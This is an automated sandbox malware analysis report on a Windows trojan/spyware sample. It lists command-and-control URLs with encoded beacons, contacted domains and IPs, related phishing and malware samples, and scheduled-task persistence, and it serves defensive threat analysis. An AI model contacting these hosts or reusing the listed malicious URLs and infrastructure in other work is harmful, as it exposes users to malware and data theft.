C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Source	Detection	Scanner	Label
http://www.absseguridad.online/vekd/	0%	Avira URL Cloud	safe
http://www.gisxj.sbs/bzmd/	100%	Avira URL Cloud	malware
http://www.aonline.top/fqlg/	0%	Avira URL Cloud	safe
http://www.emirates-visa.net/lnrv/	0%	Avira URL Cloud	safe
https://www.zizjwk.asia/s53m/?LH1t=LwZwQ/kCeukPoeELj8mhDOmmdBAOCBBa8wAeryDM2559JbEieA033ASYcolgYYbe9	0%	Avira URL Cloud	safe
http://www.yhk58.one/6gca/	0%	Avira URL Cloud	safe
http://www.sssvip2.shop/160b/?LH1t=hWImcCcxiU/zFpbJ3SQ6wCxR9Fc5S9wUNOZCazoCcTKnw7sgTnGdjC8u7pn2czzrGxdfpZQLpAAjKTjZJ1WZPS8feXQCRiRlu+tLtQzibMS7IgX58gEncot0bgcnEtvyQA==&fpJ=16J40rx8bHP8SV	0%	Avira URL Cloud	safe
http://www.gisxj.sbs/bzmd/?LH1t=Rt+43bg4Ok23e54YRfAH+vyFRMP1sUgI2DMHftvVCAd/nWF0JqXCSMibGLO2dcXMoNINCP/gJGrlf22QDBjVZjqHznYH4uPEIO/lAdIm4TOVCBTzftZlepKPWee8U8pSUA==&fpJ=16J40rx8bHP8SV	100%	Avira URL Cloud	malware
http://www.sido247.pro/c9n1/	0%	Avira URL Cloud	safe
http://www.yxni.vip/i75c/?LH1t=6YpPt3cONEAD+3jtLDhd/Wpx5gzl+zwI9O5U7w1gcS11pHuKcF79farrxfROfOqahE6dsqUHnv6H8Vej6onxvENfYcLjeeOZCJ5HSE9XR48AmqL+ar7nJpXGb6U4weXk0Q==&fpJ=16J40rx8bHP8SV	0%	Avira URL Cloud	safe
http://www.yhk58.one/6gca/?LH1t=fO7Vv7QIjIHgdzQpzhfCg2Co/QqQlpQJYQYE5YQp2rCSowSjXLls4N42Oq8UvYDhJwN7H88iyToSgsvsMFsw8qgJvlfr1LkCoo0259ZxSwy7A4vC8wcXbhrD0WwCEM58XQ==&fpJ=16J40rx8bHP8SV	0%	Avira URL Cloud	safe
http://www.aonline.top/fqlg/?fpJ=16J40rx8bHP8SV&LH1t=sQl5xb/hmEd8xAHtTI1KHbGKQqXRWyiPcilbd3ItRgiyLzuJnGXHmeDa2L3hm4hwlRjcRzlrASDvZ0AcIwfIw2xcCS/Bf2EkC2YHKHBr1XB8+HfoqQxFz1dUuY8R8/C0UQ==	0%	Avira URL Cloud	safe
http://www.zizjwk.asia/s53m/	0%	Avira URL Cloud	safe
http://www.absseguridad.online	0%	Avira URL Cloud	safe
http://www.zizjwk.asia/s53m/?LH1t=LwZwQ/kCeukPoeELj8mhDOmmdBAOCBBa8wAeryDM2559JbEieA033ASYcolgYYbe9lt1XWmLZF5oY+x7iJ9G+2momiNt1MLXajJv2P/Ny5BJRrEwaDRFNfY0RmDClZANlQ==&fpJ=16J40rx8bHP8SV	0%	Avira URL Cloud	safe
http://www.pieceofpaper.site/0ald/	0%	Avira URL Cloud	safe
http://www.sido247.pro/c9n1/?LH1t=ZLTSClZbaB8MHbtnh5rLJMnGH02tmwkswIWWkpezpf5gYt1N/Ne/nHxaobrQcFYzFcMUaIPRgQqR+CHajlNKC8baT6T5RaLhCCkZuf2y0AAyYdjagCc/QRszW3FQa/qOkg==&fpJ=16J40rx8bHP8SV	0%	Avira URL Cloud	safe
http://www.glowups.life/o8f4/	0%	Avira URL Cloud	safe
https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.ht	0%	Avira URL Cloud	safe
http://www.yxni.vip/i75c/	0%	Avira URL Cloud	safe
http://www.sssvip2.shop/160b/	0%	Avira URL Cloud	safe
http://www.absseguridad.online/vekd/?LH1t=4+03mnWHwBpjxbZK83upzCssoIYTYaC0AmwhJXtUcJzMctKA4SYWH8wIDV3ifRB0BjdWYS+2+kfE7i2zAqwY4crugBFAl0R3da1ul9ErZ5iShpdYh6TP2qhh9v/Ob9yjcQ==&fpJ=16J40rx8bHP8SV	0%	Avira URL Cloud	safe
http://www.glowups.life/o8f4/?LH1t=ooYqmC70ddwRtjg3e0x/wm7MwA1QQXIhRwSAdjgleoIh7kpuh6601uPN4XSsVUJuDgsJSN1iGUsKc/iLAYfhEKljCnL7CTlrze1oMQe9C3qLUpJZMYh8lsz5yyHVqSNemw==&fpJ=16J40rx8bHP8SV	0%	Avira URL Cloud	safe
http://www.emirates-visa.net/lnrv/?fpJ=16J40rx8bHP8SV&LH1t=djiXcRDNleKKZNnl5ghctoCIjpFqMVObRlELgbdbd2yUtNpQZcruA+vypD1zHFI3XNbubPNky5LKo0aujLSTAktuQb20GKiolDp1oULDeQwsrOm+8EdlBmeZsA4zougguw==	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
emirates-visa.net	3.33.130.190	true	true	unknown
absseguridad.online	84.32.84.32	true	true	unknown
www.arsanaroevir.sbs	188.114.96.3	true	true	unknown
www.yhk58.one	38.181.21.54	true	true	unknown
sido247.pro	84.32.84.32	true	true	unknown
www.sssvip2.shop	156.253.8.115	true	true	unknown
www.gisxj.sbs	91.195.240.123	true	true	unknown
www.zizjwk.asia	78.141.202.204	true	true	unknown
www.aonline.top	104.21.96.1	true	true	unknown
www.glowups.life	209.74.79.42	true	true	unknown
pieceofpaper.site	142.93.62.161	true	true	unknown
www.yxni.vip	192.186.57.30	true	true	unknown
www.absseguridad.online	unknown	unknown	false	unknown
www.pieceofpaper.site	unknown	unknown	false	unknown
www.sido247.pro	unknown	unknown	false	unknown
www.emirates-visa.net	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.emirates-visa.net/lnrv/	true	Avira URL Cloud: safe	unknown
http://www.sido247.pro/c9n1/	true	Avira URL Cloud: safe	unknown
http://www.gisxj.sbs/bzmd/?LH1t=Rt+43bg4Ok23e54YRfAH+vyFRMP1sUgI2DMHftvVCAd/nWF0JqXCSMibGLO2dcXMoNINCP/gJGrlf22QDBjVZjqHznYH4uPEIO/lAdIm4TOVCBTzftZlepKPWee8U8pSUA==&fpJ=16J40rx8bHP8SV	true	Avira URL Cloud: malware	unknown
http://www.yxni.vip/i75c/?LH1t=6YpPt3cONEAD+3jtLDhd/Wpx5gzl+zwI9O5U7w1gcS11pHuKcF79farrxfROfOqahE6dsqUHnv6H8Vej6onxvENfYcLjeeOZCJ5HSE9XR48AmqL+ar7nJpXGb6U4weXk0Q==&fpJ=16J40rx8bHP8SV	true	Avira URL Cloud: safe	unknown
http://www.yhk58.one/6gca/	true	Avira URL Cloud: safe	unknown
http://www.aonline.top/fqlg/	true	Avira URL Cloud: safe	unknown
http://www.gisxj.sbs/bzmd/	true	Avira URL Cloud: malware	unknown
http://www.sssvip2.shop/160b/?LH1t=hWImcCcxiU/zFpbJ3SQ6wCxR9Fc5S9wUNOZCazoCcTKnw7sgTnGdjC8u7pn2czzrGxdfpZQLpAAjKTjZJ1WZPS8feXQCRiRlu+tLtQzibMS7IgX58gEncot0bgcnEtvyQA==&fpJ=16J40rx8bHP8SV	true	Avira URL Cloud: safe	unknown
http://www.absseguridad.online/vekd/	true	Avira URL Cloud: safe	unknown
http://www.aonline.top/fqlg/?fpJ=16J40rx8bHP8SV&LH1t=sQl5xb/hmEd8xAHtTI1KHbGKQqXRWyiPcilbd3ItRgiyLzuJnGXHmeDa2L3hm4hwlRjcRzlrASDvZ0AcIwfIw2xcCS/Bf2EkC2YHKHBr1XB8+HfoqQxFz1dUuY8R8/C0UQ==	true	Avira URL Cloud: safe	unknown
http://www.yhk58.one/6gca/?LH1t=fO7Vv7QIjIHgdzQpzhfCg2Co/QqQlpQJYQYE5YQp2rCSowSjXLls4N42Oq8UvYDhJwN7H88iyToSgsvsMFsw8qgJvlfr1LkCoo0259ZxSwy7A4vC8wcXbhrD0WwCEM58XQ==&fpJ=16J40rx8bHP8SV	true	Avira URL Cloud: safe	unknown
http://www.zizjwk.asia/s53m/	true	Avira URL Cloud: safe	unknown
http://www.zizjwk.asia/s53m/?LH1t=LwZwQ/kCeukPoeELj8mhDOmmdBAOCBBa8wAeryDM2559JbEieA033ASYcolgYYbe9lt1XWmLZF5oY+x7iJ9G+2momiNt1MLXajJv2P/Ny5BJRrEwaDRFNfY0RmDClZANlQ==&fpJ=16J40rx8bHP8SV	true	Avira URL Cloud: safe	unknown
http://www.sssvip2.shop/160b/	true	Avira URL Cloud: safe	unknown
http://www.pieceofpaper.site/0ald/	true	Avira URL Cloud: safe	unknown
http://www.glowups.life/o8f4/	true	Avira URL Cloud: safe	unknown
http://www.yxni.vip/i75c/	true	Avira URL Cloud: safe	unknown
http://www.sido247.pro/c9n1/?LH1t=ZLTSClZbaB8MHbtnh5rLJMnGH02tmwkswIWWkpezpf5gYt1N/Ne/nHxaobrQcFYzFcMUaIPRgQqR+CHajlNKC8baT6T5RaLhCCkZuf2y0AAyYdjagCc/QRszW3FQa/qOkg==&fpJ=16J40rx8bHP8SV	true	Avira URL Cloud: safe	unknown
http://www.glowups.life/o8f4/?LH1t=ooYqmC70ddwRtjg3e0x/wm7MwA1QQXIhRwSAdjgleoIh7kpuh6601uPN4XSsVUJuDgsJSN1iGUsKc/iLAYfhEKljCnL7CTlrze1oMQe9C3qLUpJZMYh8lsz5yyHVqSNemw==&fpJ=16J40rx8bHP8SV	true	Avira URL Cloud: safe	unknown
http://www.absseguridad.online/vekd/?LH1t=4+03mnWHwBpjxbZK83upzCssoIYTYaC0AmwhJXtUcJzMctKA4SYWH8wIDV3ifRB0BjdWYS+2+kfE7i2zAqwY4crugBFAl0R3da1ul9ErZ5iShpdYh6TP2qhh9v/Ob9yjcQ==&fpJ=16J40rx8bHP8SV	true	Avira URL Cloud: safe	unknown
http://www.emirates-visa.net/lnrv/?fpJ=16J40rx8bHP8SV&LH1t=djiXcRDNleKKZNnl5ghctoCIjpFqMVObRlELgbdbd2yUtNpQZcruA+vypD1zHFI3XNbubPNky5LKo0aujLSTAktuQb20GKiolDp1oULDeQwsrOm+8EdlBmeZsA4zougguw==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.zizjwk.asia/s53m/?LH1t=LwZwQ/kCeukPoeELj8mhDOmmdBAOCBBa8wAeryDM2559JbEieA033ASYcolgYYbe9	winver.exe, 00000015.00000002.4062272338.00000000059BE000.00000004.10000000.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000016.00000002.4060522658.00000000033DE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.absseguridad.online	IBBkYiJCUMDfM.exe, 00000016.00000002.4059491839.00000000022F3000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	zE1VxVoZ3W.exe, 00000000.00000002.1626172856.0000000003411000.00000004.00000800.00020000.00000000.sdmp, ydRhqlPsLsIczR.exe, 0000000A.00000002.1867592446.0000000002944000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.ht	winver.exe, 00000015.00000002.4062272338.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000016.00000002.4060522658.0000000003702000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	winver.exe, 00000015.00000003.2185479046.0000000007C98000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
38.181.21.54	www.yhk58.one	United States	174	COGENT-174US	true
209.74.79.42	www.glowups.life	United States	31744	MULTIBAND-NEWHOPEUS	true
142.93.62.161	pieceofpaper.site	United States	14061	DIGITALOCEAN-ASNUS	true
104.21.96.1	www.aonline.top	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	www.arsanaroevir.sbs	European Union	13335	CLOUDFLARENETUS	true
192.186.57.30	www.yxni.vip	United States	395776	FEDERAL-ONLINE-GROUP-LLCUS	true
84.32.84.32	absseguridad.online	Lithuania	33922	NTT-LT-ASLT	true
156.253.8.115	www.sssvip2.shop	Seychelles	132813	AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK	true
91.195.240.123	www.gisxj.sbs	Germany	47846	SEDO-ASDE	true
3.33.130.190	emirates-visa.net	United States	8987	AMAZONEXPANSIONGB	true
78.141.202.204	www.zizjwk.asia	France	20473	AS-CHOOPAUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587668
Start date and time:	2025-01-10 16:38:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zE1VxVoZ3W.exe renamed because original name is a hash value
Original Sample Name:	2bd00e0d7cb7e741f8736ede2f6b354c7190e983bc38ca8326f8135b81256055.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@26/16@12/11
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 96% Number of executed functions: 124 Number of non-executed functions: 288
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.245.163.56, 13.107.253.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target IBBkYiJCUMDfM.exe, PID 5544 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:39:17	API Interceptor	1x Sleep call for process: zE1VxVoZ3W.exe modified
10:39:20	API Interceptor	44x Sleep call for process: powershell.exe modified
10:39:25	API Interceptor	1x Sleep call for process: ydRhqlPsLsIczR.exe modified
10:40:33	API Interceptor	9330017x Sleep call for process: winver.exe modified
16:39:20	Task Scheduler	Run new task: ydRhqlPsLsIczR path: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
209.74.79.42	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	www.primespot.live/icu6/
	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	www.glowups.life/dheh/
	72STaC6BmljfbIQ.exe	Get hash	malicious	FormBook	Browse	www.primespot.live/b8eq/
104.21.96.1	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
188.114.96.3	1162-201.exe	Get hash	malicious	FormBook	Browse	www.einpisalpace.shop/pgw3/
	https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005	Get hash	malicious	Unknown	Browse	jackoffjackofflilliilkillxoopoeadonline.top/drive/
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy
	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	/api/get/dll
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.glowups.life	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	209.74.79.42
www.sssvip2.shop	Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe	Get hash	malicious	FormBook	Browse	156.253.8.115
www.yxni.vip	print preview.js	Get hash	malicious	FormBook	Browse	192.186.57.30
www.yxni.vip	1013911.js	Get hash	malicious	FormBook	Browse	192.186.57.30

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	https://sign-as.allarknow.online/	Get hash	malicious	Unknown	Browse	50.7.127.10
	http://pdfdrive.com.co	Get hash	malicious	Unknown	Browse	143.244.56.53
	https://www.cineuserdad.ec	Get hash	malicious	Unknown	Browse	50.7.24.35
	5.elf	Get hash	malicious	Unknown	Browse	38.148.53.45
	armv5l.elf	Get hash	malicious	Unknown	Browse	38.12.137.2
	https://aqctslc.com/	Get hash	malicious	Unknown	Browse	38.165.16.38
	3.elf	Get hash	malicious	Unknown	Browse	154.22.18.26
	Fantazy.mips.elf	Get hash	malicious	Unknown	Browse	38.64.166.19
	Fantazy.x86.elf	Get hash	malicious	Unknown	Browse	161.82.13.62
	Fantazy.arm7.elf	Get hash	malicious	Mirai	Browse	149.50.117.107
CLOUDFLARENETUS	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	https://zfrmz.com/3GiGYUP4BArW2NBgkPU3	Get hash	malicious	Unknown	Browse	104.18.94.41
	Play_VM-NowTingrammAudiowav011.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://theleadking2435063.emlnk.com/lt.php?x=3DZy~GDHJaLL5a37-gxLhhGf13JRv_MkkPo2jHPMKXOh5XR.-Uy.xuO-2I2imNf	Get hash	malicious	Unknown	Browse	104.17.203.31
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	4iDzhJBJVv.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	https://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3f	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	DpTbBYeE7J.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	104.26.13.205
MULTIBAND-NEWHOPEUS	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	rQuotation.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	209.74.64.189
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	209.74.79.41
	ORDER - 401.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	209.74.64.58
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
	ORDER-401.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	Rockwool-Msg-S9039587897.pdf	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	209.74.95.101
	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	209.74.79.42
DIGITALOCEAN-ASNUS	Setup.exe	Get hash	malicious	Unknown	Browse	159.203.177.96
	Setup.exe	Get hash	malicious	Unknown	Browse	161.35.127.181
	Setup.exe	Get hash	malicious	Unknown	Browse	161.35.127.181
	https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t	Get hash	malicious	Unknown	Browse	165.22.210.101
	http://www.jmclmedia.ph	Get hash	malicious	Unknown	Browse	206.189.225.178
	5.elf	Get hash	malicious	Unknown	Browse	157.245.182.61
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2BpuOeo6wXhYyQnN5Dmhl9EwD4jJy2QucAxD5PJ8TFaAtq5-2Fa2JLywFyD22uAsFmhYjQLp65IuicFXReMolU22hvgQ-2B1S2bacC3gnzhuRxI8SAkOsPFFxOcYEiSSZTqVyp3m1OxPmLRrTi1o5-2FZom3YCyV1EUto77Rrvablg0dLCkGGW0ncnt-2B7IgK6LBBZRD7ITvGmpDjZtTYsz0I1qKiLzZdNfmubxarfJC5-2BcEqOw-2Ft-2FbdrugnVMUWHAHioUxjwvqr4QWKZSVt-2BeoNRvP2Adsk-2FRWXyTy-2FNsOG5tm8W5iiSHTNAe6b2ve-2F-2FMif4OPRLC2jk2zIHDBodMQqimJe7S-2B0c0a6VcurrTf-2BSSIJw1siTQylKaBjy96o6v7aWNACMPOJmDH5ybp8Hfg60OUEGx1ZLebRMpxX9k9AP7u40PlQ7YN0etELZUsiTbXY4PcX2P96RfnnTH8k4gdprbyM68BwIDNXqkSpWupXgXawXvLifC6eFYgMzHs5EFbgb5u6HEHo2__tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcL7zwYzcSR3guHWoKhXDu5EQ7SXJZpci4hCmpp1REa7W1YXEAS6JqnE9LrlFK998LZ271LMIRubQetxBOsHxh3FfsHQej0U45DqU0JnGYKUA9waD6Ny-2BL9vchurlVMDvBupSQHaqHAKs87lmzkMbvNLGI-2BMPx7o1UJrTBuhk-2BVx-2FdFVsZL4Uf2HUcBJTS73hyi	Get hash	malicious	Unknown	Browse	64.227.64.62
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DrgFz_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLui8UPBZcrEcBQ64UpH2s9-2FDpSu9qfcgYFRQKTYsD5OOP7p7kgdevUOf60UO0BtzRorOOVdIMlEbf0g38VGeCmtkP8At2J-2BxKEtoZ2O48KqLdUMGUmxH4Esb-2BPRc25uZJoq4Qo0YWw9j31285luIdhLwnz-2B9RfofSABy36tB5aPmDcVeLn5C5N5AJkqjfepa6	Get hash	malicious	Unknown	Browse	188.166.17.21
	armv7l.elf	Get hash	malicious	Unknown	Browse	178.62.201.116
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgBe3vvPhUi3NCctiT7ICCnQ-2FY8o5rhg4URlGJ-2FvsNaBLrMZH2YOUKWM-2BCE-2FXqUBn4SuSDNO43ZHONlcfV0u69WPaY48i3uh3m8lqIzkUcMcKGiml1g6PtP2N9Fq73ADmecSkBDQ1wDesGGu-2Bg3LC1PY31AnFBjTo5itfBoUzfV1y-2FNuV7ub4JBfgFfFwbfDCVw04z2QHPGmvaTuYBRiOw1Tpn5jhya1bpe-2FZKFIvw6DpoIa015fiQnAkr21qCIGDz3kcWaHiPPoAcEbgrIJQtXRwdHoKOAHjnLbHeTfYxioE2jQ-2BKzgO6L-2FLiLt79tmJXX2KYx8D6DTv7nI91sFKT8dXMJM0DazaslrneD4lIUneNyaGARqqUVvrSB7-2BzgxAL-2FuXFyd1qjf-2FnnaV5h661BgCBEWKyZBkPjSGhvc635VlrPtfR5g3T0pDVRqQ8o-2Fg4-3DfYwI_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419PER4av1iPHZIu7rMCH4g59O-2FpVm-2BPXLGfx0fQIDbM830SEyalx7CL7LS5G2wzbNPhsJ2FagkVeT-2FvL4PXhjlJE5YFKw59He2Ja9QVSEHwhUEJm-2BBDxFee6A4QFWAIxMlxI8kis-2B4bFFLDszJAKx313jD-2F4FRd82vUXuacU2lSKZ4Ah2gmv6sbaeoxYrNwq4bbw0e0DJ7EzH1nxfqSXJpTz	Get hash	malicious	Unknown	Browse	64.227.64.62

Process:	C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
